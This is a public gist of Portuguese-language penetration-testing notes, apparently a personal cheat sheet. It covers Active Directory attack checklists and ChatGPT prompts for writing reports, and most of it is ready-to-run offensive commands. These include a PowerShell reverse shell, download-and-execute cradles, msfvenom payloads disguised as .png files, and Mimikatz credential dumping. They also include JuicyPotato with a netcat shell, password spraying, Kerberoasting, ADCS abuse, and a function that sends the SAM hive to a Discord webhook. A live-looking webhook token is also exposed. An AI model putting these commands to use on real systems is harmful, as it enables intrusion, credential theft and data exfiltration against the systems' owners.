Last active
October 27, 2025 00:09
-
-
Save kalinathalie/f7d8cd032805cbb37c3807ea00451c1a to your computer and use it in GitHub Desktop.
anotacoes-super-importantes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ChatGPT queries{ | |
| Gere, tudo em inglês, primeiramente o nome de uma vulnerabilidade para "exposição de endereço de IP interno", e logo após isso, um texto pequeno e simples sobre essa vulnerabilidade, depois outro texto pequeno sobre a mitigação dessa vulnerabilidade e também gostaria do Cálculo CVSS seguindo o padrão "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referência atualizados e funcionais sobre essa vulnerabilidade. | |
| Gere, tudo em inglês, Um texto pequeno e simples sobre a vulnerabilidade de "Printers With Default Credentials", vulnerabilidade no qual é possível acessar impressoras com credenciais padrão, depois outro texto pequeno sobre a mitigação, este somente com "bulletpoints" de maneira bem direta e pontual dessa vulnerabilidade. Gostaria também de um pequeno texto e pontual sobre o impacto dessa vulnerabilidade, e também gostaria do Cálculo CVSS dessa vulnerabilidade seguindo esse exemplo: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N". E também dois links de referência atualizados e funcionais sobre essa vulnerabilidade, de preferencia tambem falando sobre a mitigação. | |
| Por favor, gere um texto conclusivo, em inglês resumido um relatorio de pentest num ambiente AD que encontrou as seguintes vulnerabilidades, ressaltando a de criticidade mais alta: | |
| You are a professional penetration tester working for the company FOO. You have just completed a web application test for the company BAR and are writing a report on the vulnerabilities found. | |
| You found the following vulnerabilities during this engagement: | |
| xss - medium | |
| information disclosure - low | |
| Write a conclusion briefly explaining the vulnerabilities, giving some insights into their potential impact. This conclusion should be 3 paragraphs long, and the vulnerabilities should not be in list format. | |
| } | |
| SSL report exemple: Timmins da HSN | |
| AD Sec Assessment{ | |
| Usar o Responder | |
| Tentar auth winrm com cada user obtido | |
| Fake Machine Creation via DHCP Poisoning | |
| Se não tiver usuario, rodar ldapnomnom ou nxc -t DC_IP -u '' -p '' --users | |
| Rodar Nessus e verificar tudo de vuln | |
| Verificar login no AD com Guest (godap) | |
| Verificar SMBs com Guest e sem User | |
| Verificar SMBs com usuarios obtidos | |
| Verificar Kerberoasting e AS-REP Roasting em todos os ADs | |
| Verificar todos os serviços web com eyewitness | |
| Verificar política de senha | |
| Testar user=pass com kerbrute | |
| Verificar vulnerabilidades conhecidas com netexec ou linwinpwn | |
| Verificar todos os hosts com signing False ou algo parecido para Coerção | |
| Verificar certificados ADCS | |
| Rodar o bloodhound | |
| Rodar o PingCastle (Windows) | |
| Rodar o sccmhunter.py | |
| Verificar FTP com anonymous:anonymous | |
| Olhar o https://hideandsec.sh/books/cheatsheets-82c/page/active-directory | |
| Olhar o https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg | |
| https://youtu.be/b0lLxLJKaRs | |
| } | |
| Web Assessment{ | |
| User Enum (login/register) | |
| SSL/TLS | |
| Password Recovery | |
| Security Headers | |
| Rate-Limit/CAPTCHA | |
| Improper Error Handling | |
| Directory Fuzzing and Wayback Machine | |
| HTML Injection/XSS/SSTI | |
| Password Policy | |
| SQLI | |
| CSRF | |
| XSS(dangerouslySetInnerHTML, innerHTML, outerHTML, insertAdjacentHTML) | |
| API e endpoints no JS | |
| } | |
| Windows Assessment{ | |
| CMD -> Powershell (powershell.exe) | |
| whoami | |
| whoami /groups | |
| Get-LocalUser | |
| Get-LocalGroup | |
| ipconfig /all | |
| route print | |
| netstat -ano | |
| Get-Process | |
| whoami /priv | |
| Get-ChildItem C:\xampp -Recurse -File | Select-String 'administrator' | Select-Object -Unique Path | |
| Get-ChildItem C:\xampp -Recurse -File | Select-String 'password' | Select-Object -Unique Path | |
| iwr('http://192.168.49.56:8000/winPEASx64.exe') -OutFile winpeas.exe | |
| iwr('http://192.168.49.56:8000/Invoke-Mimikatz.ps1') -OutFile mimi.ps1 | |
| } | |
| TestSSL{ | |
| ./testssl.sh --color 3 --warnings=batch --quiet --ip one -s -p -U -E https://www.google.com | |
| } | |
| Setup{ | |
| apt update | |
| apt install golang-go git jq eyewitness requests_toolbelt typer requests_ntlm | |
| apt remove python3-httpx | |
| go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest | |
| python3 -m pip install sprayhound | |
| git clone https://github.com/Macmod/godap | |
| cd godap | |
| go install . | |
| echo 'export PATH=$PATH:/root/go/bin:/root/.local/bin' >> ~/.zshrc && source ~/.zshrc | |
| git clone https://github.com/lefayjey/linWinPwn | |
| cd linWinPwn | |
| pipx ensurepath | |
| chmod +x install.sh | |
| ./install.sh | |
| go install github.com/lkarlslund/ldapnomnom@latest | |
| go install github.com/ropnop/kerbrute@latest | |
| git clone --depth 1 https://github.com/testssl/testssl.sh.git --branch 3.3dev | |
| git clone https://github.com/fieu/discord.sh/ | |
| echo 'export WEBHOOK="https://discord.com/api/webhooks/1213279960853254165/Jd_DeSh2KC3GsgZpSVUXm_nKIwHdl35uCRkx2uU-2vOvNHjnivhGHPGnhEEiblL8XLxl"' >> ~/.zshrc && source ~/.zshrc | |
| } | |
| Scan{ | |
| mkdir scan && cd scan | |
| nmap -sn -T2 -PR -iL ranges.txt | awk '/Nmap scan report for/ { if ($6 ~ /^\(/) gsub("[()]", "", $6); else $6=$NF; print $6 }' > hosts.txt | |
| Com masscan{ | |
| masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG masscan.gnmap | |
| } | |
| Com nmap{ | |
| nmap -p 88,389,636,3268,3269,445,139,80,8080,22,21,23,443,111,135,137,138,3389,623,1414,1433,1883,3389,3306,5432,5433,5985,5986,15672,27017,27018 -n -Pn -v -iL hosts.txt -oG nmap.gnmap -T1 | |
| } | |
| awk '/Ports:/{ if ($1=="Host:") { ip=$2; start=5 } else if ($1=="Timestamp:"){ ip=$4; start=4 } gsub(/[()]/,"",ip); for(i=start;i<=NF;i++){ if ($i ~ /\/open\//){ gsub(/,$/,"",$i); split($i,a,"/"); ports[ip] = (ports[ip] ? ports[ip]","a[1] : a[1])}}} END{ for (ip in ports) print ip, ports[ip]}' nmap.gnmap | sort -V > targets.txt | |
| mkdir output | |
| while read line; do ip=$(echo $line | cut -d' ' -f1); ports=$(echo $line | cut -d' ' -f2 | sed 's/^,//'); nmap -v -Pn -sV --script "default,safe and not intrusive and not brute" -p $ports $ip -oN output/nmap_$ip.txt; done < targets.txt | |
| } | |
| Responder{ | |
| responder -I eth0 -wd | tee -a responder.txt | |
| awk '!seen[$0]++' responder.txt > responder_clean.txt | |
| } | |
| Hashcat{ | |
| NTLMv2-SSP: .\hashcat.exe -m 5600 -a 0 .\techboss.hash rockyou2021.txt | |
| } | |
| Kerberoasting{ | |
| GetUserSPNs.py -request -dc-ip 192.168.54.97 secura.yzx/charlotte:'Game2On4.!' | |
| } | |
| Dump SMB (Sem Baixar){ | |
| pipx install git+https://github.com/blacklanternsecurity/MANSPIDER | |
| cd /root/.local/share/pipx/venvs/man-spider/lib/python3.13/site-packages/man_spider/lib/parser | |
| (edit parser.py changing 5 to 50) | |
| manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql -n 2>&1 | tee -a smb_complete_output.txt | |
| awk '!seen[$0]++' smb_complete_output.txt > smb_clean.txt | |
| } | |
| Dump SMB (Baixando){ | |
| manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql 2>&1 | |
| cd /root/.manspider | |
| zip loot.zip -r loot | |
| python3 -m http.server | |
| } | |
| Webs{ | |
| awk ' | |
| /Nmap scan report for/ {gsub("[()]", "", $NF); ip=$NF} | |
| /^[0-9]+\/tcp/ { | |
| split($1, p, "/") | |
| port=p[1] | |
| capture=0 | |
| } | |
| /http-title/ { | |
| capture=1 | |
| } | |
| capture && ip && port { | |
| print ip ":" port | |
| capture=0 | |
| } | |
| ' *.txt > http-hosts.txt | |
| httpx -l http-hosts.txt -o httpx-hosts.txt | |
| eyewitness -f httpx-hosts.txt -d screen | |
| ./run-ffuf.sh httpx-hosts.txt /usr/share/dirb/wordlists/big.txt | tee -a ffuf-output.txt | |
| #!/bin/bash | |
| if [ $# -ne 2 ]; then | |
| echo "Use: $0 <hosts_file> <wordlist>" | |
| exit 1 | |
| fi | |
| HOSTS_FILE="$1" | |
| WORDLIST="$2" | |
| STATUSCODES="200-299,301,302,307,401,403,405,500" | |
| USERAGENT="Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36" | |
| if [ ! -f "$HOSTS_FILE" ]; then | |
| echo "Can't find '$HOSTS_FILE'!" | |
| exit 2 | |
| fi | |
| if [ ! -f "$WORDLIST" ]; then | |
| echo "Can't find '$WORDLIST' !" | |
| exit 3 | |
| fi | |
| # Loop pelos hosts | |
| while IFS= read -r HOST || [ -n "$HOST" ]; do | |
| echo "[*] Running ffuf on httpx://$HOST/FUZZ" | |
| ffuf -w "$WORDLIST" \ | |
| -u "$HOST/FUZZ" \ | |
| -mc "$STATUSCODES" \ | |
| -c \ | |
| -H "User-Agent: $USERAGENT" \ | |
| -ac | |
| done < "$HOSTS_FILE" | |
| } | |
| Baixar todos os arquivos de um Directory File Enum{ | |
| sudo apt install httrack | |
| httrack 'http://172.21.101.25/global/' -O ./mirror-listagem "-*" "+http://172.21.101.25/global/*" "-*[>10240]" | |
| } | |
| Bruteforce users Blackbox{ | |
| wget https://github.com/danielmiessler/SecLists/raw/refs/heads/master/Usernames/xato-net-10-million-usernames.txt | |
| mv xato-net-10-million-usernames.txt 10kk_usernames.txt | |
| ldapnomnom --input 10kk_usernames.txt --output users_found.txt --dnsdomain domain.local --maxservers 32 --parallel 16 | |
| } | |
| Password Spray{ | |
| Pass Policy{ | |
| netexec smb 10.100.207.24 -d domain.local -u user -p pass --pass-pol | |
| } | |
| Spray{ | |
| sprayhound -U users.txt --lower -d domain.local -dc 172.20.100.100 | |
| netexec smb 192.168.1.101 -u users.txt -p Summer18 --continue-on-success | grep -v 'STATUS_LOGON_FAILURE' | |
| } | |
| user=pass{ | |
| for i in $(cat users_found.txt); do echo $i:$i; done > useraspasswd.txt | |
| kerbrute bruteforce useraspasswd.txt -d domain.local --dc 10.100.207.24 -t 5 --safe | |
| } | |
| } | |
| Safe Spray{ | |
| #!/bin/bash | |
| # Verifica argumentos | |
| if [ "$#" -ne 4 ]; then | |
| echo "Uso: $0 <target> <arquivo_usuarios> <senha> <limite_lockout>" | |
| echo "Exemplo: $0 192.168.1.24 users.txt 'Senha123' 10" | |
| exit 1 | |
| fi | |
| TARGET="$1" | |
| USERFILE="$2" | |
| PASSWORD="$3" | |
| LOCKOUT_LIMIT="$4" | |
| LOCKED=0 | |
| # Executa o netexec e monitora os resultados | |
| netexec smb "$TARGET" -u "$USERFILE" -p "$PASSWORD" --continue-on-success 2>&1 | grep -v 'STATUS_LOGON_FAILURE' | while read line; do | |
| echo "$line" | |
| if echo "$line" | grep -q "STATUS_ACCOUNT_LOCKED_OUT"; then | |
| LOCKED=$((LOCKED + 1)) | |
| echo "[!] Lockout detectado! Total: $LOCKED" | |
| if [ "$LOCKED" -ge "$LOCKOUT_LIMIT" ]; then | |
| echo "[!] Limite de lockouts atingido ($LOCKED). Abortando ataque!" | |
| pkill -f "netexec smb $TARGET" | |
| break | |
| fi | |
| fi | |
| done | |
| } | |
| Certificados{ | |
| certipy find -u 'user@domain.htb' -p '123' -dc-ip 10.22.20.121 -ns 10.22.20.121 -vulnerable -enabled -dns-tcp -output vulns.local | |
| ESC8: https://www.hackingarticles.in/adcs-esc8-ntlm-relay-to-ad-cs-http-endpoints/ | |
| certipy req -username 'KaliPC$' -password 'Password#1' -ca AUTHORITY-CA -target authority.authority.htb -dc-ip 10.129.229.56 -template CorpVPN -upn administrator@authority.htb -debug | |
| certipy cert -pfx administrator.pfx -nokey -out user.crt | |
| certipy cert -pfx administrator.pfx -nocert -out user.key | |
| python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.229.56 | |
| } | |
| Mudar senha remotamente{ | |
| changepasswd.py 'domain.local/user@10.100.100.10' -p rpc-samr | |
| } | |
| godap{ | |
| godap IP -p '1' #sem cred | |
| godap IP -u 'DOMAIN\user' -p 'Welcome123!' #padrao 1 | |
| godap IP -u 'user@DOMAIN' -p 'Senha' #padrao 2 | |
| Listar usuarios depois de salvar, ex: usuarios de alto privilegio | |
| jq -r '.Data[] | .Attributes[] | select(.Name == "sAMAccountName") | .Values[]' 1750955105754_results.json | |
| } | |
| Listar users{ | |
| netexec smb 10.201.0.6 --users | |
| } | |
| Criar computer{ | |
| impacket-addcomputer -computer-name 'KaliPC$' -computer-pass 'Password#1' -dc-host 10.129.229.56 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' | |
| } | |
| List Domains { | |
| #!/bin/bash | |
| ARQUIVO="$1" | |
| # Verifica se o arquivo existe | |
| if [ ! -f "$ARQUIVO" ]; then | |
| echo "Arquivo '$ARQUIVO' não encontrado!" | |
| exit 2 | |
| fi | |
| while IFS= read -r ip || [ -n "$ip" ]; do | |
| [ -z "$ip" ] && continue # Pula linhas vazias | |
| echo "🔎 Verificando $ip..." | |
| ldapsearch -x -H ldap://"$ip" -s base namingContexts 2>/dev/null | \ | |
| awk -F= '/^namingContexts: DC=/ { | |
| gsub(/,DC=/, ".", $0); | |
| split($0, parts, ": "); | |
| print " → " parts[2] | |
| }' | |
| echo | |
| done < "$ARQUIVO" | |
| } | |
| PowerView{ | |
| RunWithRegistryNonAdmin.bat | |
| . PowerView.ps1 | |
| Dominios da Forest{ | |
| Get-ForestDomain -Verbose | |
| } | |
| Lista de usuarios{ | |
| Get-DomainUser | select -ExpandProperty samaccountname | |
| } | |
| Lista de Computers{ | |
| Get-DomainComputer | select -ExpandProperty dnshostname | |
| } | |
| Lista de Domain Admins{ | |
| Get-DomainGroupMember -Identity "Domain Admins" | |
| } | |
| Lista OUs{ | |
| Get-DomainOU | select -ExpandProperty name | |
| } | |
| Lista Unconstrained Delegation{ | |
| Get-DomainComputer -Unconstrained | select -ExpandProperty name | |
| } | |
| Lista Constrained Delegation{ | |
| Get-DomainUser -TrustedToAuth | |
| Get-DomainComputer -TrustedToAuth | |
| } | |
| Pegar o Sid{ | |
| Get-DomainSid ; Get-DomainSid -Domain finance.corp | |
| } | |
| } | |
| Logar com um ticket{ | |
| Powershell: Enter-PSSession -ComputerName tech-dc | |
| Cmd: winrs -r:tech-dc cmd | |
| } | |
| Mimikatz{ | |
| https://tools.thehacker.recipes/mimikatz/modules | |
| iwr('http://192.168.49.56:8000/Invoke-Mimikatz.ps1') -OutFile mimi.ps1 | |
| Set-ExecutionPolicy -ExecutionPolicy bypass -Scope LocalMachine -Force | |
| Import-Module .\mimi.ps1 -Force | |
| Invoke-Mimikatz -DumpCreds | |
| Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"' | |
| Invoke-Mimikatz -Command '"vault::cred /patch"' | |
| Invoke-Mimikatz -Command '"sekurlsa::credman"' | |
| Invoke-Mimikatz -Command '"lsadump::sam"' | |
| Invoke-Mimikatz -Command '"lsadump::cache"' | |
| Invoke-Mimikatz -Command '"lsadump::secrets"' | |
| problema com arquitetura: | |
| & "$env:WINDIR\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Write-Host 'Is64BitProcess=' ([Environment]::Is64BitProcess); Set-Location '$pwd'; Import-Module .\Invoke-Mimikatz.ps1 -Force; Invoke-Mimikatz -DumpCreds" | |
| } | |
| DONPAPI{ | |
| donpapi collect -u Administrator -p 'Password321' --domain thm.local --dc-ip 10.10.118.180 --fetch-pvk | |
| donpapi gui | |
| } | |
| Ver Admins da maquina{ | |
| net localgroup Administrators | |
| } | |
| Listar Arquivos Recursivamente{ | |
| gci -recurse | |
| } | |
| Solve windows2Linux{ | |
| dos2unix file.sh | |
| } | |
| Encontrar coisas no Linux{ | |
| find / -type f -readable 2>/dev/null | while read -r file; do | |
| grep -IEni --color=always -E 'password|passwd|pwd|user(name)?|login|credential|secret|token|key|auth' "$file" 2>/dev/null | cut -c -300 | sed "s|^|$file:|" | |
| done | tee resultados_busca.txt | |
| Trufflehog | |
| rg -i -F --hidden password -M 1024 | |
| } | |
| Invoke Outro Usuario{ | |
| runas | |
| OU -> | |
| $pw = convertto-securestring -AsPlainText -Force -String SENHA-SENHA | |
| $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist "Domain\User",$pw | |
| Enter-PSSession -ComputerName localhost -Credential $cred | |
| Enter-PSSession -Id 1 | |
| OU -> | |
| Invoke-Command -ScriptBlock {whoami} -Credential $cred -computername localhost | |
| } | |
| Executar comando em outro Host Windows{ | |
| PsExec.exe \\srv.domain.local cmd | |
| psexec.py Domain/user:pass@host comando | |
| ou | |
| psexec.py Domain/user@host #ele vai dar shell | |
| evil-winrm -i 10.129.96.155 -u melanie -p 'Welcom123!' # Via WinRM | |
| winrs -r:dcorp-mgmt "cmd /c whoami" #Via WinRM | |
| mstsc.exe | |
| } | |
| Executar exe em powershell e salvar output em arquivo{ | |
| cmd /c "file.exe > output.txt" | |
| } | |
| Potato{ | |
| Pegar CLSID (https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise) | |
| certutil.exe -urlcache -split -f "http://10.10.14.5:1335/CLSID.list" CLSID.list | |
| certutil.exe -urlcache -split -f "http://10.10.14.5:1335/test.bat" test.bat | |
| certutil.exe -urlcache -split -f "http://10.10.14.5:1335/JuicyPotato.exe" JuicyPotato.exe | |
| test.bat | |
| type result.log (procurar NT SYSTEM) | |
| juicypotato.exe -l 1234(PORTA-FODASE) -p nc.exe -a " -nv 10.10.14.5 1339 -e cmd.exe" -t * -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34} | |
| ou | |
| .\JuicyPotato.exe -l 443 -p c:\windows\system32\cmd.exe -a "/c c:\Users\charlotte\Desktop\nc.exe -e cmd.exe 192.168.45.245 443" -t * | |
| } | |
| Tenho uma Webshell e agora?{ | |
| CMD to POWERSHELL: | |
| powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" | |
| Ou se precisar de mais comandos de bypass: | |
| powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
| } | |
| Upgrade TTY shell{ | |
| python3 -c 'import pty; pty.spawn("/bin/bash")' | |
| Ctrl + Z | |
| stty echo -raw; fg | |
| export TERM=xterm | |
| } | |
| Download SMB{ | |
| recurse ON | |
| prompt OFF | |
| mget * | |
| } | |
| Baixar arquivo{ | |
| msiexec /q /i https://github.com/kalinathalie/qualquercoisa.txt | |
| certutil.exe -urlcache -split -f "https://github.com/kalinathalie/qualquercoisa.txt" c:\windows\temp\agoravai.txt | |
| powershell -c "iwr('https://github.com/kalinathalie/qualquercoisa.txt')|iex" #e executar | |
| powershell -c "iwr('http://10.10.14.3/file.exe') -OutFile file.exe" | |
| powershell -nop -exec bypass -w 1 iex(New-Object net.webclient).DownloadString('http://10.10.14.3/file.exe') | |
| powershell wget http://ip/file.exe -O file.exe | |
| } | |
| Zipar pasta{ | |
| powershell "Add-Type -A System.IO.Compression.FileSystem; [IO.Compression.ZipFile]::CreateFromDirectory('D:/OpaOpa', 'C:/Temp/OpaOpa.zip')" | |
| } | |
| Buscar arquivos recursivamente{ | |
| powershell Get-ChildItem C:\ -recurse -include "access.log" | |
| FINDSTR /L /S /I /N /C:"algo" *.txt | |
| findstr /s /m /c:"password" * | |
| } | |
| Install msfconsole{ | |
| wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run | |
| } | |
| Meterpreter shell{ | |
| msfconsole | |
| use multi/handler | |
| set payload windows/meterpreter/reverse_https | |
| set LHOST 10.100.100.10 | |
| set LPORT 4444 | |
| run | |
| msfvenom -p windows/meterpreter/reverse_https LHOST=10.100.100.10 LPORT=4444 -f exe > agoravai.png | |
| Github | |
| nc -vnlp 4443 | |
| certutil.exe -urlcache -split -f "https://github.com/kalinathalie/agoravai2.png" c:\windows\temp\agoravai2.png | |
| Rename-Item -Path "c:\windows\temp\agoravai2.png" -NewName "agoravai2.exe" | |
| cd c:\windows\temp | |
| .\agoravai2.exe | |
| } | |
| Proxeamento pro servidor via Meterpreter{ | |
| #Meterpreter | |
| ipconfig -> pegar informações da rede | |
| background | |
| #msfconsole | |
| use post/multi/manage/autoroute | |
| set SUBNET 172.31.43.0 | |
| set session 1 | |
| exploit | |
| use auxiliary/server/socks_proxy | |
| set SRVHOST 0.0.0.0 | |
| set SRVPORT 8080 | |
| route add 172.31.43.223 255.255.240.0 1 | |
| run | |
| #/etc/proxychains.conf [Disable 'proxy_dns'] | |
| socks4 127.0.0.1 8080 | |
| #seu computador | |
| proxychains nmap -sV -Pn -v 172.31.43.223 | |
| } | |
| Proxeamento pro servidor via Chisel{ | |
| ./chisel server -p 8081 --reverse # Minha maquina | |
| ./chisel client -v 10.10.14.2:8081 R:1080:socks # Servidor | |
| #Proxychains! | |
| } | |
| TailScale{ | |
| curl -fsSL https://tailscale.com/install.sh | sh | |
| sudo systemctl enable --now tailscaled | |
| sudo tailscale up | |
| ssh -D 1080 user@100.101.102.103 | |
| } | |
| Proxeamento pro servidor via SSH{ | |
| nohup ssh -R 1081 -o StrictHostKeyChecking=no tunel@10.10.14.2 2>/dev/null & # Maquina alvo | |
| } | |
| Conectar remotamente Windows{ | |
| MSSQL: mssqlclient.py DOMAIN/username@[Target_IP] -windows-auth | |
| python3 psexec.py username@[Target_IP] | |
| } | |
| MSFVENOM{ | |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.100.100.10 LPORT=4444 -f msi > 100security.png | |
| } | |
| BloodHound{ | |
| /bin/neo4j start | |
| bloodhound-python -u usuario -p senha -ns IP-NS -dc DOMAIN-CONTROLLER --disable-autogc -d DOMAIN | |
| Exemplo: bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 --disable-autogc -d domain.local -v | |
| Exemplo2: bloodhound-python -d domain.yzx -u 'user'\@domain.yzx -p 'pass' --auth-method ntlm -c all,LoggedOn -ns 192.168.224.97 --dns-timeout 10 -dc DC01.secura.yzx | |
| bloodhound | |
| } | |
| DnsDump{ | |
| python3 dnsdump.py -u 'user' -p 'senha' DC | |
| } | |
| Upload file discord{ | |
| Windows{ | |
| function Upload-Discord {[CmdletBinding()] param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text) $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; | |
| Upload-Discord -file "C:\Windows\System32\config\SAM" -text "Key-File" | |
| } | |
| Linux{ | |
| git clone https://github.com/fieu/discord.sh/ | |
| discord.sh --webhook-url="$WEBHOOK" --file file.txt | |
| } | |
| } | |
| Unicorn(Quando msf-venon não da. Payload-MSF){ | |
| https://github.com/karemfaisal/SMUC/blob/master/MSHTA/Mshta.md | |
| python3 unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 | |
| msfconsole | |
| msf6 > use multi/handler | |
| msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https | |
| msf6 exploit(multi/handler) > run -j | |
| } | |
| Enviar um arquivo do servidor para minha maquina{ | |
| from flask import Flask, request | |
| app = Flask(__name__) | |
| @app.route('/upload', methods=['POST']) | |
| def upload_file(): | |
| if 'file' not in request.files: | |
| return 'No file part' | |
| file = request.files['file'] | |
| if file.filename == '': | |
| return 'No selected file' | |
| file.save(file.filename) | |
| return 'File uploaded successfully' | |
| if __name__ == '__main__': | |
| app.run(host='0.0.0.0', debug=True) | |
| curl.exe -X POST -F "file=@C:\Docs\arquivo.pdf" http://10.10.14.6:5000/upload | |
| } | |
| https://github.com/S3cur3Th1sSh1t/WinPwn | |
| https://github.com/lefayjey/linWinPwn{ | |
| ./linWinPwn.sh -t <Domain_Controller_IP> [-d <AD_domain> -u <AD_user> -p <AD_password> > -o saida.txt] | |
| } | |
| Port Scan gambiarra (Se a maquina n tiver nd){ | |
| for x in {1..4096}; do curl -s -m 2 172.16.22.1:"$x"; [ "$?" -ne "7" ] && [ "$?" -ne "28" ] && echo "[+] Port $x open"; done | |
| } |
Comments are disabled for this gist.